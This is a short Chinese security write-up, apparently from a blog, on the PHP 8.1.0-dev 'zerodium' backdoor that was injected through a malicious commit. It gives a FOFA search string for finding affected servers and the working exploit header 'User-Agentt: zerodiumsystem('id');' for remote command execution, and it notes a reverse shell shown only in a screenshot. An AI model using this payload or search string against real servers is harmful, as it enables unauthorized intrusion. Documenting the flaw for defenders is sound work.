PHP_zerodium后门漏洞

# PHP zerodium后门漏洞

## 漏洞描述

PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。

目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitHub上进行。

## 漏洞影响

> [!NOTE]
>
> PHP 8.1.0-dev

## FOFA

> [!NOTE]
>
> “PHP/8.1.0-dev”

## 漏洞复现

后门为添加请求头

“`
User-Agentt: zerodiumsystem(‘id’);
“`

> [!NOTE]
>
> 是 User-Agentt 不是 User-Agent

![](/static/qingy/PHP_zerodium后门漏洞/img/1.png)

反弹shell

![](/static/qingy/PHP_zerodium后门漏洞/img/2.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容